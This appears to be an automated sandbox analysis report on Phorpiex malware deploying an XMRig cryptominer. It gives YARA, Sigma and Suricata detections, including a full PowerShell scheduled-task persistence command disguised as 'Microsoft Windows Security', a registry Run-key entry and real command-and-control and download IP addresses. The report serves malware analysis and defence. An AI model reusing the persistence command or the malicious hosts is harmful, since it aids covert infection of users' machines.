47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
29.2.winupsecvmgr.exe.7ff731d10320.2.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
29.2.winupsecvmgr.exe.7ff731d10320.2.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ca268:$a1: mining.set_target 0x4c5a48:$a2: XMRIG_HOSTNAME 0x4c7540:$a3: Usage: xmrig [OPTIONS] 0x4c5a20:$a4: XMRIG_VERSION
29.2.winupsecvmgr.exe.7ff731d10320.2.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d0241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
29.2.winupsecvmgr.exe.7ff731d10320.2.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d07a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d0fc8:$s3: \\.\WinRing0_ 0x4c94c8:$s4: pool_wallet 0x4c52d0:$s5: cryptonight 0x4c52e0:$s5: cryptonight 0x4c52f0:$s5: cryptonight 0x4c5300:$s5: cryptonight 0x4c5318:$s5: cryptonight 0x4c5328:$s5: cryptonight 0x4c5338:$s5: cryptonight 0x4c5350:$s5: cryptonight 0x4c5360:$s5: cryptonight 0x4c5378:$s5: cryptonight 0x4c5390:$s5: cryptonight 0x4c53a0:$s5: cryptonight 0x4c53b0:$s5: cryptonight 0x4c53c0:$s5: cryptonight 0x4c53d8:$s5: cryptonight 0x4c53f0:$s5: cryptonight 0x4c5400:$s5: cryptonight 0x4c5410:$s5: cryptonight
47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ca268:$a1: mining.set_target 0x4c5a48:$a2: XMRIG_HOSTNAME 0x4c7540:$a3: Usage: xmrig [OPTIONS] 0x4c5a20:$a4: XMRIG_VERSION
47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d0241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d07a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d0fc8:$s3: \\.\WinRing0_ 0x4c94c8:$s4: pool_wallet 0x4c52d0:$s5: cryptonight 0x4c52e0:$s5: cryptonight 0x4c52f0:$s5: cryptonight 0x4c5300:$s5: cryptonight 0x4c5318:$s5: cryptonight 0x4c5328:$s5: cryptonight 0x4c5338:$s5: cryptonight 0x4c5350:$s5: cryptonight 0x4c5360:$s5: cryptonight 0x4c5378:$s5: cryptonight 0x4c5390:$s5: cryptonight 0x4c53a0:$s5: cryptonight 0x4c53b0:$s5: cryptonight 0x4c53c0:$s5: cryptonight 0x4c53d8:$s5: cryptonight 0x4c53f0:$s5: cryptonight 0x4c5400:$s5: cryptonight 0x4c5410:$s5: cryptonight
Click to see the 32 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7296, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2779421088.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2779421088.exe, ParentProcessId: 8088, ParentProcessName: 2779421088.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8108, ProcessName: svchost.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysnldcvmr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\896429707.exe, ProcessId: 7668, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7296, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2779421088.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2779421088.exe, ParentProcessId: 8088, ParentProcessName: 2779421088.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8108, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:40.488686+0100	2022050	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.11	49710	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:34.169860+0100	2022051	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.11	49710	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:40.487004+0100	2019714	2	Potentially Bad Traffic	192.168.2.11	49710	185.215.113.66	80	TCP
2024-12-05T17:32:05.059911+0100	2019714	2	Potentially Bad Traffic	192.168.2.11	49775	185.215.113.66	80	TCP

ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:58.006372+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	95.81.102.72	40500	UDP
2024-12-05T17:32:03.043155+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	92.38.19.10	40500	UDP
2024-12-05T17:32:08.039333+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	45.150.24.42	40500	UDP
2024-12-05T17:32:13.051634+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	2.187.91.108	40500	UDP
2024-12-05T17:32:18.068485+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	109.74.69.43	40500	UDP
2024-12-05T17:32:28.290139+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	2.133.136.145	40500	UDP
2024-12-05T17:32:33.313347+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	2.176.72.136	40500	UDP
2024-12-05T17:32:38.355798+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	89.236.217.71	40500	UDP
2024-12-05T17:32:43.364147+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	89.219.115.156	40500	UDP
2024-12-05T17:32:48.383200+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	213.230.126.39	40500	UDP
2024-12-05T17:32:53.380543+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	2.179.117.33	40500	UDP
2024-12-05T17:32:58.401795+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	217.30.162.161	40500	UDP
2024-12-05T17:33:03.441463+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	95.59.165.102	40500	UDP
2024-12-05T17:33:08.475109+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	90.156.160.30	40500	UDP
2024-12-05T17:33:13.491162+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	88.204.241.182	40500	UDP
2024-12-05T17:33:28.529779+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	154.71.253.54	40500	UDP
2024-12-05T17:33:33.520524+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	92.124.152.236	40500	UDP
2024-12-05T17:33:38.540485+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	90.156.162.5	40500	UDP
2024-12-05T17:33:53.590550+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	151.242.48.19	40500	UDP
2024-12-05T17:34:03.604243+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	178.67.165.88	40500	UDP
2024-12-05T17:34:08.634390+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	31.47.175.39	40500	UDP
2024-12-05T17:34:13.675559+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	189.173.142.192	40500	UDP
2024-12-05T17:34:18.713529+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	198.163.204.6	40500	UDP
2024-12-05T17:34:23.722460+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	85.9.133.202	40500	UDP
2024-12-05T17:34:28.755066+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	37.21.118.106	40500	UDP
2024-12-05T17:34:33.775801+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	38.222.194.190	40500	UDP
2024-12-05T17:34:38.819079+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	78.109.103.103	40500	UDP
2024-12-05T17:34:43.846973+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	2.133.70.66	40500	UDP
2024-12-05T17:34:48.870685+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	5.76.0.203	40500	UDP
2024-12-05T17:34:54.015756+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	109.68.122.14	40500	UDP
2024-12-05T17:35:09.510773+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	189.167.22.36	40500	UDP
2024-12-05T17:35:19.548640+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	212.13.170.223	40500	UDP
2024-12-05T17:35:24.568299+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	89.249.62.7	40500	UDP
2024-12-05T17:35:34.608881+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	46.248.34.12	40500	UDP
2024-12-05T17:35:49.628423+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	2.180.115.76	40500	UDP
2024-12-05T17:35:59.643983+0100	2044077	1	A Network Trojan was detected	192.168.2.11	62307	178.253.102.214	40500	UDP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:34.169860+0100	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.11	50039	185.215.113.66	5152	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:45.063425+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49721	185.215.113.66	80	TCP
2024-12-05T17:31:52.642676+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49721	185.215.113.66	80	TCP
2024-12-05T17:31:56.247698+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49747	185.215.113.66	80	TCP
2024-12-05T17:31:59.111763+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49756	185.215.113.66	80	TCP
2024-12-05T17:32:04.849116+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49756	185.215.113.66	80	TCP
2024-12-05T17:32:05.059911+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49775	185.215.113.66	80	TCP
2024-12-05T17:32:07.374436+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49781	185.215.113.66	80	TCP
2024-12-05T17:32:12.945904+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49781	185.215.113.66	80	TCP
2024-12-05T17:32:13.190239+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49793	185.215.113.84	80	TCP
2024-12-05T17:32:15.415639+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49800	185.215.113.66	80	TCP
2024-12-05T17:32:21.799108+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49800	185.215.113.66	80	TCP
2024-12-05T17:32:24.736506+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49819	185.215.113.66	80	TCP
2024-12-05T17:32:30.897343+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49833	91.202.233.141	80	TCP
2024-12-05T17:32:30.926727+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49819	185.215.113.66	80	TCP
2024-12-05T17:32:33.492490+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49838	185.215.113.66	80	TCP
2024-12-05T17:32:41.753669+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:44.277680+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:47.058413+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:49.525535+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:52.001242+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:56.706016+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49903	185.215.113.66	80	TCP
2024-12-05T17:33:00.283137+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49912	185.215.113.66	80	TCP
2024-12-05T17:33:04.389434+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49922	185.215.113.66	80	TCP
2024-12-05T17:33:08.017766+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49933	185.215.113.66	80	TCP
2024-12-05T17:33:11.536043+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49941	185.215.113.66	80	TCP
2024-12-05T17:33:16.187905+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49953	91.202.233.141	80	TCP
2024-12-05T17:33:19.696726+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49963	91.202.233.141	80	TCP
2024-12-05T17:33:23.261472+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49971	91.202.233.141	80	TCP
2024-12-05T17:33:26.948685+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49981	91.202.233.141	80	TCP
2024-12-05T17:33:30.498877+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49991	91.202.233.141	80	TCP
2024-12-05T17:33:35.287748+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50003	185.215.113.66	80	TCP
2024-12-05T17:33:38.893392+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50010	185.215.113.66	80	TCP
2024-12-05T17:33:42.671566+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50020	185.215.113.66	80	TCP
2024-12-05T17:33:46.277185+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50028	185.215.113.66	80	TCP
2024-12-05T17:33:49.902410+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50031	185.215.113.66	80	TCP
2024-12-05T17:33:54.656231+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50033	91.202.233.141	80	TCP
2024-12-05T17:33:58.212808+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50035	91.202.233.141	80	TCP
2024-12-05T17:34:01.914153+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50036	91.202.233.141	80	TCP
2024-12-05T17:34:05.860091+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50038	91.202.233.141	80	TCP
2024-12-05T17:34:10.077835+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50041	91.202.233.141	80	TCP
2024-12-05T17:34:15.521961+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50043	185.215.113.66	80	TCP
2024-12-05T17:34:19.357396+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50045	185.215.113.66	80	TCP
2024-12-05T17:34:23.229363+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50046	185.215.113.66	80	TCP
2024-12-05T17:34:27.083721+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50048	185.215.113.66	80	TCP
2024-12-05T17:34:30.871341+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50050	185.215.113.66	80	TCP
2024-12-05T17:34:36.240351+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50052	91.202.233.141	80	TCP
2024-12-05T17:34:40.418042+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50054	91.202.233.141	80	TCP
2024-12-05T17:34:44.421681+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50055	91.202.233.141	80	TCP
2024-12-05T17:34:48.157586+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50057	91.202.233.141	80	TCP
2024-12-05T17:34:52.510546+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50059	91.202.233.141	80	TCP
2024-12-05T17:34:58.674738+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50061	185.215.113.66	80	TCP
2024-12-05T17:35:02.360041+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50063	185.215.113.66	80	TCP
2024-12-05T17:35:06.198040+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50064	185.215.113.66	80	TCP
2024-12-05T17:35:09.837541+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50066	185.215.113.66	80	TCP
2024-12-05T17:35:13.491459+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50068	185.215.113.66	80	TCP
2024-12-05T17:35:18.167455+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50070	91.202.233.141	80	TCP
2024-12-05T17:35:21.797150+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50071	91.202.233.141	80	TCP
2024-12-05T17:35:25.411308+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50073	91.202.233.141	80	TCP
2024-12-05T17:35:29.061048+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50075	91.202.233.141	80	TCP
2024-12-05T17:35:32.740048+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50077	91.202.233.141	80	TCP
2024-12-05T17:35:37.820344+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50078	185.215.113.66	80	TCP
2024-12-05T17:35:41.796669+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50080	185.215.113.66	80	TCP
2024-12-05T17:35:45.373070+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50082	185.215.113.66	80	TCP
2024-12-05T17:35:48.870959+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50084	185.215.113.66	80	TCP
2024-12-05T17:35:52.381305+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50085	185.215.113.66	80	TCP
2024-12-05T17:35:56.905546+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50087	91.202.233.141	80	TCP
2024-12-05T17:36:00.434999+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	50089	91.202.233.141	80	TCP

ETPRO MALWARE Phorpiex Domain in DNS Lookup

